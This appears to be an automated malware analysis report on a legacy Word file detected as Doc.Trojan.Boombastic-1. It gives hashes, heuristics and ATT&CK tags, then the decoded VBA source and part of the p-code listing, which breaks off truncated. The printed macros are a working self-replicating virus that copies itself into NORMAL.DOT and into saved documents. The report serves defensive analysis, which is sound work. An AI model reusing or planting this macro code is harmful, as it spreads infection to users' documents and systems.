Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 43966fea7f66ca25…

MALICIOUS

Office (OLE)

Size: 44.0 KB
Created: 1999-03-18 19:25:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3a6b992e5d92af0ecd13d2ce81760425
SHA-1: ce5b381ec31ebaa15f8c914f31c5088948a2d3ab
SHA-256: 43966fea7f66ca252f27715b424cb06dad8b553aee86a1342a5d110894dc21e3
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, specifically an AutoOpen macro. The macro attempts to save the document in a macro-enabled format and uses the WordBasic Organizer to copy several macros ('AutoOpen', 'DateiSpeichernUnter', 'System', 'AutoExec') into the new document, indicating an attempt to establish persistence or execute further malicious actions. The ClamAV detection 'Doc.Trojan.Boombastic-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Boombastic-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Boombastic-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9899 bytes
SHA-256: 30f9f97e4c928b01560dfc6f04211e9e48835baa938a3b1ef506d3efdfe5efc5
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "DateiSpeichernUnter"

Public Sub MAIN()
Dim formatnr
Dim Datname$
Dim Anzahl
Rem Only a test, but a good one, from Mr. Boombastic and Sir WIXALOT !!!
On Error GoTo -1: On Error GoTo ciao
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
formatnr = dlg.Format
If formatnr = 0 Or 1 Or 6 Then
    Datname$ = dlg.Name
    dlg.Format = 1
        WordBasic.FileSaveAs dlg
        For Anzahl = 1 To WordBasic.CountMacros(1, 0, 0)
                If WordBasic.[MacroName$](Anzahl, 1) = "System" Then GoTo ciao
        Next Anzahl
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="AutoOpen", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="DateiSpeichernUnter", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="System", Tab:=3
        WordBasic.Organizer Copy:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Destination:=Datname$, Name:="AutoExec", Tab:=3
    If WordBasic.IsDocumentDirty() = -1 Then WordBasic.FileSave
Else
    WordBasic.FileSaveAs dlg
End If
ciao:
WordBasic.Call "AutoExec"
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim Anzahl
Rem Mr. Boombastic and Sir WIXALOT !!!
On Error Resume Next
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
    For Anzahl = 1 To WordBasic.CountMacros(0)
        If WordBasic.[MacroName$](Anzahl, 0) = "System" Then GoTo ciao
    Next Anzahl
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="AutoOpen", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DateiSpeichernUnter", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="System", Tab:=3
    WordBasic.Organizer Copy:=1, Source:=WordBasic.[FileName$](0), Destination:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="AutoExec", Tab:=3
ciao:
WordBasic.Call "AutoExec"
End Sub

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Dim wert$
Rem Mr. Boombastic and Sir WIXALOT !!!
On Error Resume Next
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0
wert$ = "13:13:13"
WordBasic.OnTime wert$, "System", 30
End Sub

' Processing file: /opt/analyzer/scan_staging/e6667bb8d91142058b9b195746091d8c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1184 bytes
' Macros/VBA/DateiSpeichernUnter - 2932 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn formatnr
' Line #3:
' 	Dim 
' 	VarDefn Datname
' Line #4:
' 	Dim 
' 	VarDefn Anzahl
' Line #5:
' 	Rem 0x0045 " Only a test, but a good one, from Mr. Boombastic and Sir WIXALOT !!!"
' Line #6:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError ciao 
' Line #7:
' 	LitDI2 0x0001 
' 	ParamNamed FastSaves 
' 	LitDI2 0x0000 
' 	ParamNamed GlobalDotPrompt 
' 	Ld WordBasic 
' 	ArgsMemCall ToolsOptionsSave 0x0002 
' Line #8:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #9:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #10:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #11:
' 	Ld dlg 
' 	MemLd Format$ 
' 	St fo
... (truncated)